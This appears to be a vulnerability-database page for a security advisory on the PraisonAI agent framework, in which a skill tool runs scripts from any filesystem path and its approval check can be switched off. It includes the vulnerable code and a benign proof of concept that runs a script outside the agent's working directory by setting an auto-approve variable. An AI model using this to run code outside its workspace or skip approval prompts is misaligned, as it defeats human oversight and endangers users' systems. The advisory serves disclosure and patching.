CVE-2026-61443High· 8.1▾ TwilightPraisonAI: SkillTools Executes Scripts Without Path Containment Validation
▾ Twilight zone — High severity, or a signal on a lesser flaw
impact 44.6 · likelihood 0.2 · exploitation 0
Need a working PoC? Pro members can cast a request and our team develops one — it lands right here.
Disclosure to exploitation, from the record and what we observed since indexing it.
Disclosed via GHSA
0.8%
SkillTools.run_skill_script() accepts a script_path parameter and executes it via subprocess.run() without any path containment validation. While FileTools has _validate_path() with traversal detection, SkillTools performs none. An LLM-directed call can execute arbitrary scripts from any filesystem location. The @require_approval decorator can be bypassed via YAML approve: for high-risk tools.
src/praisonai-agents/praisonaiagents/tools/skill_tools.py (lines 69-119):
def run_skill_script(self, script_path: str, ...):
script_path = os.path.expanduser(script_path)
if not os.path.isabs(script_path):
script_path = os.path.join(self._working_directory, script_path)
script_path = os.path.abspath(script_path)
if not os.path.exists(script_path):
return f"Error: Script not found at {script_path}"
# No path traversal check, no containment validation
# Directly executes whatever is at that path:
result = subprocess.run(cmd, ...)
By contrast, FileTools._validate_path() (src/praisonai-agents/praisonaiagents/tools/file_tools.py, lines 42-78) properly validates that the resolved path stays within the working directory:
def _validate_path(self, filepath: str) -> str:
# ...
cwd = os.path.abspath(os.getcwd())
if os.path.commonpath([absolute, cwd]) != cwd:
raise ValueError(f"Path traversal detected: {filepath} escapes workspace {cwd}")
SkillTools has no equivalent check.
import os, tempfile
from praisonaiagents.tools.skill_tools import SkillTools
# Create a "safe" working directory (the jail)
jail = tempfile.mkdtemp(prefix="skill_jail_")
# Create a malicious script OUTSIDE the jail
attack_script = os.path.join(tempfile.gettempdir(), "malicious_skill.sh")
with open(attack_script, 'w') as f:
f.write("#!/bin/bash\n")
f.write("echo \"PROOF_OF_EXPLOIT: Script executed outside jail\"\n")
f.write("echo \"USER: $(whoami)\"\n")
f.write("echo \"HOSTNAME: $(hostname)\"\n")
os.chmod(attack_script, 0o755)
# Bypass approval (simulates Docker env or YAML approve:)
os.environ["PRAISONAI_AUTO_APPROVE"] = "true"
st = SkillTools()
st._working_directory = jail # Pretend we're confined
# Run script from OUTSIDE the jail — no path validation!
result = st.run_skill_script(attack_script)
print(result)
# Output:
# PROOF_OF_EXPLOIT: Script executed outside jail
# USER: anushkavirgaonkar
# HOSTNAME: Anushkas-MacBook-Pro-2.local
# Cleanup
del os.environ["PRAISONAI_AUTO_APPROVE"]
os.unlink(attack_script)
os.rmdir(jail)
Tested result: The script at /tmp/malicious_skill.sh executed successfully despite the working directory being set to a jail directory. The output confirms arbitrary script execution including whoami and hostname. No path containment check exists — the absolute path is accepted and executed directly.
write_file (YAML-approvable as a high-risk tool), then execute it via run_skill_scriptUSER directive), so an escaped script runs with full root privilegespraisonaiagents <= 1.6.77Upgrade to a patched release:
praisonaiagents 1.6.78Connected by shared product, vendor, weakness, or advisory.
GHSA-f352-4x87-wmjhHigh· 8.1Duplicate Advisory: PraisonAI: SkillTools Executes Scripts Without Path Containment Validation
CVE-2026-60089MediumPraisonAI: Project config can auto-save agent output outside the project root
GHSA-rrqj-82cc-g6h4Medium· 5.5Duplicate Advisory: PraisonAI: Project config can auto-save agent output outside the project root
GHSA-3f4v-mp44-x4x2Medium· 5.7Duplicate Advisory: PraisonAI: FastContext path resolution permits absolute and traversal reads outside the workspace
CVE-2026-61432Medium· 5.7PraisonAI: FastContext path resolution permits absolute and traversal reads outside the workspace
CVE-2026-55527High· 7.1praisonaiagents vulnerable to arbitrary file write via unsanitized `user_id` in `FileMemory.__init__()` — path traversal to any writable …